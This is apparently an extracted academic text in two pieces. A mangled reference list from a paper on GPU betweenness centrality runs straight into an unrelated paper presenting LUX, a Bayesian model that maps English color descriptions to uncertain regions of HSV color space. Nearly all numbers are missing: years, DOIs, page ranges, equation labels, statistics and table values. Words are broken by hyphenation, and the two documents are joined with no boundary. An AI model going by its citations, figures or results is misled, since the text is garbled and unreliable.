http://dx.doi.org/ . /peerj. http://dx.doi.org/ . /msb http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ barabási a-l, albert r. . emergence of scaling in random networks. science ( ): – doi . /science. . . . barthélemy m. . betweenness centrality in large complex networks. european physical journal b ( ): – doi . /epjb/e - - . bell n, garland m. . implementing sparse matrix–vector multiplication on throughput- oriented processors. in: proceedings of the conference on high performance computing networking, storage and analysis (sc’ ). new york: acm, : – : . brandes u. . a faster algorithm for betweenness centrality. journal of mathematical sociology ( ): – . cong g, bader da. . an experimental study of parallel biconnected components algorithms on symmetric multiprocessors (smps). 
in: th ieee international parallel and distributed processing symposium, denver, co, usa. washington, d.c.: ieee, b. davidson a, baxter s, garland m, owens jd. . work-efficient parallel gpu methods for single-source shortest paths. in: ieee th international parallel and distributed processing symposium, phoenix, az, usa. washington, d.c.: ieee, – . de domenico m, lima a, mougel p, musolesi m. . the anatomy of a scientific rumor. scientific reports ( ): doi . /srep . delling d, goldberg av, nowatzyk a, werneck rf. . phast: hardware-accelerated shortest path trees. in: proceedings of the ieee international parallel and distributed processing symposium (ipdps’ ). washington, dc: ieee computer society, – . dijkstra ew. . a note on two problems in connexion with graphs. numerische mathematik ( ): – doi . /bf . erdös p, rényi a. . on random graphs i. publicationes mathematicae (debrecen) : – . floyd rw. . algorithm : shortest path. communications of acm ( ): doi . / . . freeman lc. . a set of measures of centrality based on betweenness. sociometry ( ): – doi . / . girvan m, newman mej. . community structure in social and biological networks. proceedings of the national academy of sciences of the united states of america ( ): – . goh k-i, oh e, kahng b, kim d. . betweenness centrality correlation in social networks. physical review e ( ): doi . /physreve. . . gregor d, lumsdaine a. . the parallel bgl: a generic library for distributed graph computations. in: parallel object-oriented scientific computing (poosc), bloomington, in, usa. harish p, narayanan pj. . accelerating large graph algorithms on the gpu using cuda. berlin: springer, – . hong s, kim sk, oguntebi t, olukotun k. . accelerating cuda graph algorithms at maximum warp. in: proceedings of the th acm symposium on principles and practice of parallel programming (ppopp’ ). new york: acm, – . jia y, lu v, hoberock j, garland m, hart jc. . edge v. node parallelism for graph centrality metrics. gpu computing gems : – doi . /b - - - - . - . lee m-j, choi s, chung c-w. . efficient algorithms for updating betweenness centrality in fully dynamic graphs. information sciences (supplement c): – doi . /j.ins. . . . leskovec j, adamic la, huberman ba. . the dynamics of viral marketing. acm transactions on the web (tweb) ( ): doi . / . . fan et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /science. . . http://dx.doi.org/ . /epjb/e - - http://dx.doi.org/ . /srep http://dx.doi.org/ . /bf http://dx.doi.org/ . / . http://dx.doi.org/ . / http://dx.doi.org/ . /physreve. . http://dx.doi.org/ . /b - - - - . - http://dx.doi.org/ . /j.ins. . . http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ leskovec j, chakrabarti d, kleinberg j, faloutsos c, ghahramani z. . kronecker graphs: an approach to modeling networks. journal of machine learning research : – . leskovec j, krevl a. . snap datasets: stanford large network dataset collection. available at http://snap.stanford.edu/data. leydesdorff l. . betweenness centrality as an indicator of the interdisciplinarity of scientific journals. journal of the american society for information science and technology ( ): – doi . /asi. . ma x, sayama h. . mental disorder recovery correlated with centralities and interactions on an online social network. peerj :e doi . /peerj. . martin pj, torres r, gavilanes a. . cuda solutions for the sssp problem. in: proceedings of the th international conference on computational science: part i (iccs’ ). 
berlin: springer-verlag, – . mclaughlin a, bader da. . scalable and high performance betweenness centrality on the gpu. in: proceedings of the international conference for high performance computing, networking, storage and analysis (sc’ ). piscataway: ieee press, – . mclaughlin a, bader da. . fast execution of simultaneous breadth-first searches on sparse graphs. in: ieee st international conference on parallel and distributed systems (icpads), melbourne, vic, australia. washington, d.c.: ieee computer society, – . merrill d, garland m, grimshaw a. . high-performance and scalable gpu graph traversal. acm transactions on parallel computing ( ): – doi . / . mitchell r, frank e. . accelerating the xgboost algorithm using gpu computing. peerj computer science :e doi . /peerj-cs. . motter ae, lai y-c. . cascade-based attacks on complex networks. physical review e ( ): doi . /physreve. . . nasre m, pontecorvi m, ramachandran v. . betweenness centrality—incremental and faster. berlin: springer, – . ortega-arranz h, torres y, llanos dr, gonzalez-escribano a. . a new gpu-based approach to the shortest path problem. in: international conference on high performance computing simulation (hpcs), helsinki, finland. washington, d.c.: ieee, – . palla g, farkas ij, pollner p, derényi i, vicsek t. . fundamental statistical features and self-similar properties of tagged networks. new journal of physics ( ): doi . / - / / / . rossi ra, ahmed nk. . the network data repository with interactive graph analytics and visualization. in: proceedings of the twenty-ninth aaai conference on artificial intelligence, austin, texas. palo alto: association for the advancement of artificial intelligence. sariyüce ae, kaya k, saule e, çatalyürek uv. . betweenness centrality on gpus and heterogeneous architectures. in: proceedings of the sixth workshop on general purpose processor using graphics processing units (gpgpu- ). new york: acm, – . shi z, zhang b. . fast network centrality analysis using gpus. bmc bioinformatics ( ): doi . / - - - . siek jg, lee l-q, lumsdaine a. . the boost graph library: user guide and reference manual, portable documents. upper saddle river, new jersey: pearson education. singh rr, goel k, iyengar srs, gupta s. . a faster algorithm to update betweenness centrality after node alteration. internet mathematics ( – ): – doi . / . . . fan et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://snap.stanford.edu/data http://dx.doi.org/ . /asi. http://dx.doi.org/ . /peerj. http://dx.doi.org/ . / http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . /physreve. . http://dx.doi.org/ . / - / / / http://dx.doi.org/ . / - - - http://dx.doi.org/ . / . . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ solomonik e, besta m, vella f, hoefler t. . scaling betweenness centrality using communication-efficient sparse matrix multiplication. in: jackie k, ed. the international conference for high performance computing, networking, storage and analysis (s), denver, co, usa. new york: acm. wang y, davidson a, pan y, wu y, riffel a, owens jd. . gunrock: a high-performance graph processing library on the gpu. in: proceedings of the th acm sigplan symposium on principles and practice of parallel programming (ppopp ). new york: acm, – . wang y, davidson a, pan y, wu y, riffel a, owens jd. . gunrock: a high-performance graph processing library on the gpu. in: proceedings of the st acm sigplan symposium on principles and practice of parallel programming (ppopp’ ). new york: acm, : , : . fan et al. 
a bayesian model of grounded color semantics

brian mcmahan, rutgers university, brian.mcmahan@rutgers.edu
matthew stone, rutgers university, matthew.stone@rutgers.edu

abstract
natural language meanings allow speakers to encode important real-world distinctions, but corpora of grounded language use also reveal that speakers categorize the world in different ways and describe situations with different terminology. to learn meanings from data, we therefore need to link underlying representations of meaning to models of speaker judgment and speaker choice. this paper describes a new approach to this problem: we model variability through uncertainty in categorization boundaries and distributions over preferred vocabulary. we apply the approach to a large data set of color descriptions, where statistical evaluation documents its accuracy. the results are available as a lexicon of uncertain color standards (lux), which supports future efforts in grounded language understanding and generation by probabilistically mapping english color descriptions to potentially context-sensitive regions in hsv color space.

introduction
to ground natural language semantics in real-world data at large scale requires researchers to confront the vocabulary problem (furnas et al., ). much of what people say falls in a long tail of increasingly infrequent and specialized items. moreover, the choice of how to categorize and describe real-world data varies across people. we can't account for this complexity by deriving one definitive mapping between words and the world.

we see this complexity already in free text descriptions of color patches. english has fewer than a dozen basic color words (berlin, ), but people's descriptions of colors are much more variable than this would suggest. measured on the corpus described in section . , there's an average of . bits of information in a color description given the color it describes—comparable to rolling a -sided die. figure summarizes the data and plots the entropy of descriptions encountered within small bins of color space. the bins are aggregated over the saturation and value dimensions and indexed on the x-axis by the hue dimension.

figure : a visualization of the variability of the descriptions used to name colors within small bins of color space (x-axis: hue; y-axis: entropy in bits). for each hue value, the entropy values for each bin along the saturation and value dimensions are grouped and plotted as box plots. the dotted line corresponds to a random choice out of fourteen items and to the perplexity of a histogram model trained on the corpus.

there's little reason to think that this variability conceals consistent meanings. in formal semantics, one of the hallmarks of vague language is that speakers can make it more precise in alternative, incompatible ways (barker, ). we see this in practice as well, for example with the image of figure , where subjects comprehensibly describe either of two dogs as the tan one.

figure : image by flickr user joanne bacon (jlbacon) from the data set of young et al. ( ), whose subjects describe these dogs as a brown dog and a tan one or a tan dog and a white one.

systems that robustly understand or generate descriptions of colors in situated dialogue need models of meaning that capture this variability. this paper makes two key contributions towards this challenge.
first, we present a methodology to infer a corpus-based model of meaning that ac- counts for possible differences in word usage across different speakers. as we explain in section , our approach differs from the typical perspective in grounded semantics (tellex et al., a; matuszek et al., ; krishnamurthy and kollar, ), where a meaning is reduced to a single classifier that collapses patterns of variation. instead, our model allows for variability in meaning by positing uncer- tainty in classification boundaries that can get re- solved when a speaker chooses to use a word on a specific occasion. we explain the model and its the- oretical rationale in section . second, we develop and release a lexicon of uncertain color standards (lux) by applying our methodology to color descriptions. lux is an inter- pretation of distinct english color descriptions as distributions over regions of the hue–saturation– value color space that describe their possible mean- ings. as we describe in section , the model is trained by machine learning methods from a subset of randall munroe’s publicly-available cor- pus of . million crowdsourced free-text descrip- tions of color patches (munroe, ). data, models and visualization software are available at http: //mcmahan.io/lux/. statistical evaluation of our model against two alternative approaches documents its effectiveness. the model makes better quantitative predictions than a brute-force memorization model; it seems to generalize to unseen data in more meaningful ways. at the same time, our meanings work as well as special-purpose models to explain speaker choice, even though our model supports diverse other rea- soning. see section . we see color as the first of many applications of our methodology, and are optimistic about learn- ing vague meanings for other continuous domains as quantity, space, and time. at the same time, the methodology opens up new prospects for re- search on negotiating meaning interactively (lars- son, ) with principled representations and with broad coverage. in fact, many practical situated dia- logue systems already identify unfamiliar objects by color. we expect that lux will provide a broadly useful resource to extend the range of descriptions such systems can generate and understand. related work grounded semantics is the task of mapping rep- resentations of linguistic meaning to the physical world, whether by perceptual mechanisms (har- nad, ) or with the assistance of social inter- action (devault et al., ). in this paper, we are particularly concerned with grounding the mean- ings of primitive vocabulary. however, the ulti- mate test of grounded semantics—whether it is un- derstanding commands (winograd, ; tellex et al., b), describing states of the world (chen and mooney, ), or identifying objects (matuszek et al., ; krishnamurthy and kollar, ; dawson et al., )—is the ability to interpret or generate utterances using lexical and compositional seman- tics so as to evoke appropriate real-world referents. grounded semantics therefore involves more than just quantifying the associations between words and perceptual representations, as chuang et al. ( ) and heer and stone ( ) do for color. grounded semantics involves interpreting semantic primitives in terms of composable categories that let systems discriminate between cases where a word applies and cases where the word does not apply. (our eval- uation compares models of grounded semantics to more direct models of word–world associations.) 
previous research has modeled these categories as regions of suitable perceptual feature spaces. researchers have explored explicit spaces of high-level perceptual attributes (farhadi et al., ; silberer et al., ), approximations to such spaces (matuszek et al., ), or low-level feature spaces such as bag of visual words (bruni et al., ) or histogram of gradients (krishnamurthy and kollar, ). we specifically follow gärdenfors ( ) and jäger ( ) in assuming that color categories are convex regions in an underlying color space, and are not just determined by prototypical color values, such as in andreas and klein ( ).

however, unlike previous grounded semantics, we do not assume that words name categories unequivocally. speakers may vary in how they interpret a word, so we treat the link between words and categories probabilistically. the difference makes training our model more indirect than previous approaches to grounded meaning. in particular, our model introduces a new layer of uncertainty that describes what category the speaker uses. similar kinds of uncertainty can be found in bayesian models of speaker strategy, such as that of smith et al. ( ). however, this research has assumed that speakers aim to be as informative as possible. we have no evidence that our speakers do that. we assume only that speakers' utterances are reliable and mirror prevailing usage.

prior work by cognitive scientists has studied color terms extensively, but focused on basic ones—monolexemic, top-level color words with general application and high frequency in a language (kay et al., ; lammens, ). these color categories seem to shape people's expectations and memory for colors (persaud and hemmer, ), and patterns of color naming can therefore enhance software for helping people organize and interact with color (chuang et al., ; heer and stone, ). moreover, crosslinguistic evidence suggests that the human perceptual system places strong biases on the meanings of the basic color terms (regier et al., ), perhaps because basic terms must partition the perceptual space in an efficient way (regier et al., ). we depart from research on basic color naming in considering a much wider range of terms, much like andreas and klein ( ). we consider subordinate, non-basic terms like beige or lavender; modified colors like light blue or bright green; and named subcategories like olive green, navy blue or brick red.

in order to use semantic primitives for understanding, it's necessary to combine them into an integrated sentence-level representation: this is the problem of semantic parsing. semantic parsers can be built by hand (winograd, ), induced through inductive logic programming (zelle and mooney, ), or treated as a structured classification problem (zettlemoyer and collins, ). once a suitable logical form is derived, interpretation typically involves a recursive process of finding referents that fit lexical categories and relationships (mavridis and roy, ; tellex et al., a). while this paper does not explicitly address how our meanings might be used in conjunction with such techniques, we see no fundamental obstacle to doing so—for example, by resolving references probabilistically and marginalizing over uncertainty in meaning.

using vague color terms: a model
our model involves two significant innovations over previous approaches to grounded meaning.
the first is to capture the vagueness and flexibility of grounded meaning with semantic representations that treat meaning as uncertain. we represent the semantics of a color description with a distribu- tion over color categories, which weights possible meanings by the relative likelihood of a speaker us- ing this meaning on any particular occasion. for example, speakers might associate yellowish green with a range of possible meanings, differing in how far the color category extends into green hues. by representing uncertainty about meaning, our model makes room to capture variability in language use. for example, it implicitly quantifies how likely speakers are to use words differently, as with the two interpretations of tan in figure . our second contribution is our simple model of the relationship between semantics and pragmatics. we assume that speakers’ choices mirror established patterns. in particular, the model learns a measure of availability for each color term that tracks how frequently speakers tend to use it when it is appli- cable. for example, although the expressions yel- lowish green and chartreuse are associated with very similar color categories, people say yellowish green much more often: it has a higher availability. empir- ically, we find few terms with high availability and a long tail of terms with lower availabilities. we as- sume speakers simply sample applicable terms from this distribution, which predicts the long tail of ob- served responses. mathematically, we develop our approach through the rational analysis methodology for explaining human behavior proposed by anderson ( ), along with methodological insights from the linguistics and philosophy of vagueness. in the remainder of this section, we explain the theoretical antecedents in perceptual science, linguistics and cognitive modeling that inform our approach. . color categories color can be defined as sensations by which the per- ceptual system tracks the diffuse reflectance of ob- jects, despite variability, uncertainty and ambiguity in the visual input. red, green, and blue cones in the retina allow the visual system to coarsely es- timate frequency bands in the spectrum of incom- ing light. cameras and screens that use the red– green–blue (rgb) color space are designed roughly to correspond to these responses. however, colors in the visual system summarize spectral profiles rather than mere wavelengths of light. for example, we see colors like cyan (green plus blue without red), ma- genta (blue plus red without green) and yellow (red plus green without blue) as intermediate saturated colors between the familiar primaries. this natu- rally leads to a wheel of hues describing the relative prominence of different spectral components along a continuum. fairchild ( ) provides an overview of color appearance. to capture this variation, we’ll work in the sim- ple hue–saturation–value (hsv) color space that’s common in computer graphics and color picker user interfaces (hughes et al., ) and implemented in python’s native colorsys package. this coordinate system represents colors with three distinct qualita- tive dimensions: hue (h) represents changes in tint around a color wheel, saturation (s) represents the relative proportion of color versus gray, and value (v) represents the location on the white–black con- tinuum. we will associate color categories with rect- angular box-shaped regions in hsv space. 
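the hsv representation used above is the one implemented in python's native colorsys package, so a minimal sketch of the conversion may help make the coordinates concrete; the rgb triple below is an arbitrary illustrative value, not an item from the corpus used later.

    import colorsys

    # colorsys expects r, g, b in [0, 1] and returns h, s, v, also in [0, 1]:
    # h is the position around the color wheel, s the proportion of color versus gray,
    # and v the location on the white-black continuum.
    r, g, b = 154 / 255.0, 205 / 255.0, 50 / 255.0   # an arbitrary yellowish-green pixel
    h, s, v = colorsys.rgb_to_hsv(r, g, b)
    print(h, s, v)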
(more sophisticated color spaces have been developed to describe the psychophysics of color more precisely, but they depend on the photometric illumination and other aspects of the viewing context that were not controlled in the collection of the data we are using (fairchild, ).)

semantic representation
our assumption is that color terms are associated probabilistically with color categories. we illustrate the idea for the color label yellowish-green through the plot in figure . the plot shows variation in use of the term across the hue dimension: the bar graph is a scaled histogram of the responses in the data we use. there is a range of colors where people use yellowish green often, surrounded by borderline cases where it becomes increasingly infrequent.

figure : the lux model for "yellowish green" on the hue axis plotted against the scaled histogram of the responses in the data (x-axis: hue, with µlower and µupper marked; y-axis: probability). the φ curve represents the likelihood of "yellowish green" for different hue values. the τ curves represent possible boundaries.

we represent this variability by assuming that the boundaries that delimit the color are uncertain. in any utterance, yellowish green fits only those hue values that are above a minimum threshold τlower and below a maximum threshold τupper. however, it is uncertain which thresholds a speaker will use. the model describes this variability with probability density functions. they are shown for yellowish green in figure as the τ distributions. the figure shows that there is a central range of hues, between the τ distributions, that is definitely yellowish green. the τ distributions peak at the most likely boundaries for yellowish green, encompassing a broad region that's frequently called yellowish green. further away, threshold values and yellowish green utterances alike become rapidly less likely.

our representation is motivated by barker ( ) and lassiter ( ), who show how sets of possible thresholds can account for many of our intuitions about the use of vague language. their analysis invites us to capture semantic variability through two geometric constructs. first, there is a certain interval, parameterized by two points, µlower and µupper, within which a color description definitely applies. outside this interval are regions of borderline cases, delimited by probabilistically varying thresholds τlower and τupper, where the color description sometimes applies. we represent the position of the threshold with a Γ(α, β) distribution, a standard statistical tool to model processes that start, continue indefinitely, and stop, like waiting times. we can determine a likelihood that a description fits a color by marginalizing over the thresholds: this gives the black curve visualized in figure . as we describe in section . , we can use this to account for the graded responses from subjects that we observe near color boundaries.

we summarize with a formal definition of our semantic representation. let X be the three-dimensional space of hsv colors and let x ∈ X be a measured color value. each color label k has definite boundaries, µlower and µupper in X, delimiting a box of hsv color space. surrounding the definite region are regions of uncertainty: the set of possible boundaries beyond µ. these are represented by probability distributions over lower and upper threshold values in each dimension.
we'll represent these thresholds by τ^{j,d}_k, where k ∈ K indexes the color label, j ∈ {lower/l, upper/u} indexes the boundary, and d ∈ {h, s, v} indexes color components. we assume the thresholds are distributed as follows:

τ^{lower,d}_k ∼ µ^{lower,d}_k − Γ(α^{lower,d}_k, β^{lower,d}_k)
τ^{upper,d}_k ∼ µ^{upper,d}_k + Γ(α^{upper,d}_k, β^{upper,d}_k)

the meaning of a color term is thus a "blurry box". (we treat the terms "boundary", "threshold", and "standard" as synonymous, but useful in different contexts. Γ distributions rise quickly away from the origin point, then trail off from the peak in an open-ended exponential decay. one intuition for applying them in this case is graff fara's ( ) suggestion that a particular categorization decision involves waiting to find a natural break among salient colors. however, we choose them for mathematical convenience rather than psychological or linguistic considerations.) the distribution lets us determine the probability of a point x falling into the color category k, as in the following expression; the second line gives the compact notation we also use:

p(τ^{lower,h}_k < x^h < τ^{upper,h}_k) × p(τ^{lower,s}_k < x^s < τ^{upper,s}_k) × p(τ^{lower,v}_k < x^v < τ^{upper,v}_k)
= ∏_d p(τ^{l,d}_k < x^d < τ^{u,d}_k)

rational observer model
our goal is to learn probabilistic representations of the meanings of color terms from subjects' responses. to do this, we need not only a framework for representing colors but also a model of how subjects choose color terms. inspired by rational analysis (anderson, ), we assume that speakers' choices match their communicative goals and their semantic knowledge. we leverage this assumption to derive a bayes rational observer model linking semantics to observed color descriptions.

the graphical model in figure formalizes our approach. we start from an observed color patch, x. the rational observer uses the τ-distributions for each color description k to determine the likelihood that the speaker judges k applicable. as defined above, the likelihood is the subset of possible boundaries which contain the target color value. normally, many descriptions will be applicable. which the speaker chooses depends further on the availability of the label—a background measure of how frequently a label is chosen when it's applicable. intuitively, availability creates a bias for easy descriptions, capturing how natural or ordinary a description is in language use, how easily it springs to mind or how easily it is understood.

figure : the rational observer observes a color patch, x. the applicability of each label (k^true) is based upon the label parameters (α, β, µ) and x. the label (k^said) is sampled proportional to the applicability and a background weight: how often a label is said when it applies.

we formalize this as a generative model. as we explain in section , we infer the parameters from our data. we consider the conditional distribution of a subject observing a color patch with hsv value x and labeling it k:

p(k^said, k^true | x) = p(k^said | k^true) p(k^true | x)

in this equation, k^said is the event that the subject responds to x with label k and k^true is the event that the subject judges k true of the hsv value x. the two factors of this equation are respectively the availability and applicability of the color label.

availability: the prior p(k^said | k^true) quantifies the rate at which label k is used when it applies. we refer to this quantity as the availability and denote it as α_k. availability captures the observed bias for frequent color terms.
when multiple color labels fit a color value, those with higher availability will be used more often, but those with lower availability will still get used. this effect is partially responsible for the long tail of subjects' responses.

applicability: the second factor, p(k^true | x), is the probability that k is true of, or applies to, the color value x. we calculate the applicability by marginalizing over all possible thresholds, as above: in other words, we calculate the probability mass of the boundaries which allow this description to apply. we treat each applicability judgment as independent of others. this implies that the relative frequency at which we see a color description used is directly proportional to the proportion of boundaries which license it. for clearer notation and parameter estimation, we track thresholds with a piecewise function φ^d_k(x^d), defined below and illustrated in figure :

φ^d_k(x^d) = p(x^d > τ^{l,d}_k)   if x^d ≤ µ^{l,d}_k
           = p(x^d < τ^{u,d}_k)   if x^d ≥ µ^{u,d}_k
           = 1                    otherwise

finally, the equation below rewrites the conditional distribution to make the applicability and availability explicit. the model treats this equation as the probability of success for a bernoulli trial and the data as sampled from categorical distributions formed by the set of bernoulli random variables, one per label. this is discussed further in section . .

p(k^said, k^true | x) = α_k ∏_d φ^d_k(x^d)
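as a minimal, hypothetical sketch of these two factors, the snippet below computes the per-dimension applicability and the resulting choice weight with scipy's gamma distribution; treating β as a rate (scale = 1/β) and the particular parameter values are assumptions made only for illustration, not the released lux settings.

    import numpy as np
    from scipy.stats import gamma

    def phi(x, mu_lo, mu_hi, a_lo, b_lo, a_hi, b_hi):
        # per-dimension applicability: 1 inside the definite interval [mu_lo, mu_hi];
        # outside it, the probability mass of thresholds that still reach past x.
        if x <= mu_lo:
            return gamma.sf(mu_lo - x, a_lo, scale=1.0 / b_lo)   # p(x > tau_lower)
        if x >= mu_hi:
            return gamma.sf(x - mu_hi, a_hi, scale=1.0 / b_hi)   # p(x < tau_upper)
        return 1.0

    def choice_weight(x_hsv, dim_params, availability):
        # availability alpha_k times the product of per-dimension applicabilities.
        applicability = np.prod([phi(x, *p) for x, p in zip(x_hsv, dim_params)])
        return availability * applicability

    # invented parameters for one label: (mu_lo, mu_hi, a_lo, b_lo, a_hi, b_hi) per hsv dimension.
    params = [(0.20, 0.28, 2.0, 40.0, 2.0, 40.0),   # hue
              (0.30, 0.90, 2.0, 10.0, 2.0, 10.0),   # saturation
              (0.40, 0.95, 2.0, 10.0, 2.0, 10.0)]   # value
    print(choice_weight((0.31, 0.55, 0.70), params, availability=0.05))

normalizing these weights across all labels that fit a color value gives the distribution from which the modeled speaker samples a description.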
we are left with color labels that fit these restrictions. finally, we used python’s colorsys to convert from rgb to hsv, where we hypothesize color meanings can be represented more simply. we include these data sets with our release at http://mcmahan. io/lux/ so our results can be replicated. . fitting the model parameters optimization of the model’s parameters is framed in a bayesian framework and interpreted as maximiz- ing the likelihood of the data given the parameters. we fit each label and each dimension independently. the data on each dimension is binned, as in figure , so we have binomial random variables for each bin. for each color label k, the probability of success is based on the model’s parameters. non-k data in the bin are observations of failure. this gives eq. : p(ndi,k|n d i ,z d k,φk) ∼ bin(n d i ,z d kφ d k(i)) ( ) here ndi is the number of data points in bin i on di- mension d, ndi,k is the number of data points for la- bel k in bin i on dimension d, and zdk is a normal- ization constant, implicitly reflecting both the avail- ability αk and the distribution of responses of the term across other color dimensions. the optimiza- tion process is a parameter search method which uses as an objective function the probability of ndi,k in eq. for all d,i, and k. parameter search: we adopt a bayesian coor- dinate descent which sequentially samples the cer- tain region parameter, µ, and the shape and rate pa- rameters (α and β) of the Γ distributions for all d and k independently. it also samples the estimated normalization constant, zdk . more specifically, the sampling is done using metropolis-hastings markov chain monte carlo (metropolis et al., ; chib and greenberg, ), which performs a gaussian random walk on the parameters . for each sample, the likelihood of the data, derived from the bino- mial variables, is compared for the new and old set we set the standard deviation of the sampling gaussian to be for each µ and . for each α and β after finding experi- mentally that it led to effective parameter search (gelman et al., ). of parameters. the new parameters are accepted proportionally to the ratio of the two likelihoods. multiple chains were run using different bin sizes per dimension and monitored for convergence using the generalized gelman-rubin diagnostic method (brooks and gelman, ). this methodology leaves us not only with the monte carlo estimate of the expected value for each parameter, but also a sampling distribution that quantifies the uncertainty in the parameters themselves. availability: availability is estimated as the ratio of the observed frequency of a label to its expected frequency given the parameters which define its dis- tribution. the expected frequency, a marginalization of the color space for the φ function, is calculated using the midpoint integration approximation. ( ) αk = p(ksaid,ktrue) p(ktrue) = count(k)/n∫ x p(ktrue|x)p(x) model evaluation lux explains munroe’s data via speakers’ rational use of probabilistic meanings, represented as sim- ple “blurry boxes”. in this section, we assess the effectiveness of this explanation. we anticipate two arguments against our model: first, that the represen- tation is too simple; second, that factoring speakers’ choices through a model of meaning is too cumber- some. we rebut these arguments by providing met- rics and results that suggest that lux escapes these objections and captures almost all of the structure in subjects’ responses. . 
alternative models to test lux’s representations, we built a brute-force histogram model (hm) that discretizes hsv space and tracks frequency distributions of labels directly in each discretized bin. similar histogram models have been developed by chuang et al. ( ) and (heer and stone, ) to build interfaces for inter- acting with color that are informed by human cat- egorization and naming. more precisely, our hm uses a linear interpolation method (chen and good- man, ) to combine three histograms of various http://mcmahan.io/lux/ http://mcmahan.io/lux/ granularity. this amounts to predicting responses by querying the training data. hm has the potential to expose whether lux is missing important fea- tures of the distribution of color descriptions. we also built a direct model of subjects’ choices of color terms. instead of appealing to the applica- bility and availability of a color label, it works with the observed frequency of a color label and a gaus- sian model of the probability of a color value for each label, as in eq. : ( )p(ksaid,ktrue|x) ∝p(x|ktrue)p(ksaid,ktrue) this gaussian model (gm) generalizes munroe’s pairing of labels with prototypical colors: p(x|ktrue) is a gaussian with diagonal covari- ance, so it associates each color term with a mean hsv value and with variances in each dimension that determine a label-specific distance metric. gm predicts speaker choice by weighting these distances probabilistically against the priors. gm completely sidesteps the need to model meaning categorically. it therefore has the potential to expose whether our assumptions about semantic representations and speaker choices hinder lux’s performance. . evaluation metrics we evaluate the models using two classes of met- rics on a held-out test set consisting of % of the corpus. the first type is based upon the posterior distribution over labels and the ranked position of subjects’ actual labels of color values. the second type is based upon the log likelihood of the models, which quantifies model fit. . . decision-based metrics to answer how accurate a model’s predictions are, we can locate subjects’ responses in the weighted rankings computed by the models. the topk measures: each model provides a posterior distribution over the possible labels. the most likely label of this posterior is the maximum likelihood estimate (mle). we track how often the mle color label is what the user actually said as specifically, the histograms are of size ( , , ), ( , , ), and ( , , ) across hue, saturation, and value with interpolation weights of . , . , and . respectively. these parame- ters were determined by taking the training set as -fold valida- tion sets. the top measure. for the histogram model, the top approximates the most frequent label ob- served in the data for a color value. we also measure how often the correct label appears in the first and most likely labels. these are denoted top and top respectively. . . likelihood-based metrics we can also measure how well a model explains speaker choice using the log likelihood of the labels given the model and the color values, denoted as llv (m). this is calculated using eq. across all n data points in the held-out test set. llv (m) is used when computing perplexity and aikake in- formation criterion (aic). we report all measures in bits. 
llv (m) = log pm (k true,ksaid|x) = ∑ i log pm (k true i ,k said i |xi) ( ) a more general measure of model fit is the log like- lihood of the color values and their labels jointly across the training set, ll(v ), given the model. it is defined and calculated analogously. perplexity perplexity has been used in past re- search to measure the performance of statistical lan- guage models (jelinek et al., ; brown et al., ). lower perplexity means that the model is less surprised by the data and so describes it more pre- cisely. we use it here to measure how well a model encodes the regularities in color descriptions. akaike information criterion: aic is derived from information theory (akaike, ) and bal- ances the model’s fit to the data with the complexity of the model by penalizing a larger number of pa- rameters. the intuition is that a smaller aic indi- cates a better balance of parameters and model fit. . evaluation results table summarizes the decision-based evalua- tion results. we see little penalty for lux and there is a caveat to these performance measures. all of the reported numbers are for the final data subset which we discuss in section . . we choose to use a subset which did not include color labels that had less than occurrences. in the english- speaking and american-citizenship subset, the rare description tail accounts for % of the data—roughly one third of the tail data is unique descriptions. if the tail represents real world top top top lux . % . % . % hm . % . % . % gm . % . % . % table : decision-based results. the percentage of cor- rect responses of , test-set data points are shown. −ll −llv aic perp lux . * . * . * . hm . * . * . * . gm . * . * . * . table : likelihood-based evaluation results: negative log likelihood of the data, negative log likelihood of labels given points, number of parameters, akaike in- formation criterion and perplexity of labels given color values. parameter counts for aic are for lux, for hm and for gm. gm’s constrained frameworks for modeling choices. however, the differences in the table, though nu- merically small, are significant (by binomial test) at p < . or less. in particular, the fact that lux wins top hints that its representations enable bet- ter generalization than hm or gm. the success of hm at top and top , meanwhile, suggests that some qualitative aspects of people’s use of color words do escape the strong assumptions of lux and gm—a point we return to below. at the same time, we draw a general lesson from the overall patterns of results in table . language users must be quite uncertain about how speakers will describe colors. speakers do not seem to choose the most likely color label in a majority of responses; their behavior shows a long tail. these results are in line with the probabilistic models of meaning and speaker choice we have developed. table summarizes the likelihood based metrics. gm’s estimates don’t fit the distribution of the test data as a whole: gm is a good model of what labels speakers give but not a good model of the points that get particular labels. by contrast, lux tops out ev- ery row in the table. hm is flexible enough in prin- ciple to mirror lux’s predictions; hm must suffer circumstances, our model is only applicable % of the time, and thus the performance metrics should be scaled down. we do not explicitly report the scaled numbers. from sparse data, given its vast number of parame- ters. 
our analysis of patterns of error in lux suggests that lux would be best improved by more faithful models of linguistic meaning, rather than more elaborate models of subjects' choices or more powerful learning methods. for one thing, neither lux nor the simple prototype model captures ambiguity, which sometimes arises in munroe's data. an example is the color label melon, which has a multimodal distribution in the reddish-orange and green areas of color space shown in figure —most likely corresponding to people thinking about the distinct colors of the flesh of watermelon, cantaloupe and honeydew. interestingly, our model captures the more common usage.

figure : for the hue dimension, the data for "melon" is plotted against the lux model's φ curve (x-axis: hue; y-axis: probability).

a different modeling challenge is illustrated by the behavior of greenish in figure . greenish seems to be an exception to the general assumption that color terms label convex categories. actually, greenish seems to fit the boundary of green—the areas that are not definitely green but not definitely not green. (linguists often appeal to such concepts in the literature on vagueness.) this is not a convex area so, not surprisingly, our model finds a poor match. additional research is needed to understand when it's appropriate to give meanings more complex representations and how they can be learned.

figure : for the hue dimension, the data for "greenish" is plotted against the lux model's φ curve, with the µ and τ boundaries marked (x-axis: hue; y-axis: probability).

discussion and conclusion
natural language color descriptions provide an expressive, precise but open-ended vocabulary to characterize real-world objects. this paper documents and releases the lexicon of uncertain color standards (lux), which provides semantic representations of english color labels, derived from a large corpus of attested descriptions. our evaluation shows that lux provides a precise description of speakers' free-text labels of color patches. our expectation therefore is that lux will serve as a useful resource for building systems for situated language understanding and generation that need to describe colors to english-speaking users.

our work in lux has built closely on linguistic approaches to color meaning and psychological approaches to modeling experimental subjects. because lux bridges linguistic theory, psychological data, and system building, lux also affords a unique set of resources for future research at the intersection of semantics and pragmatics of dialogue.

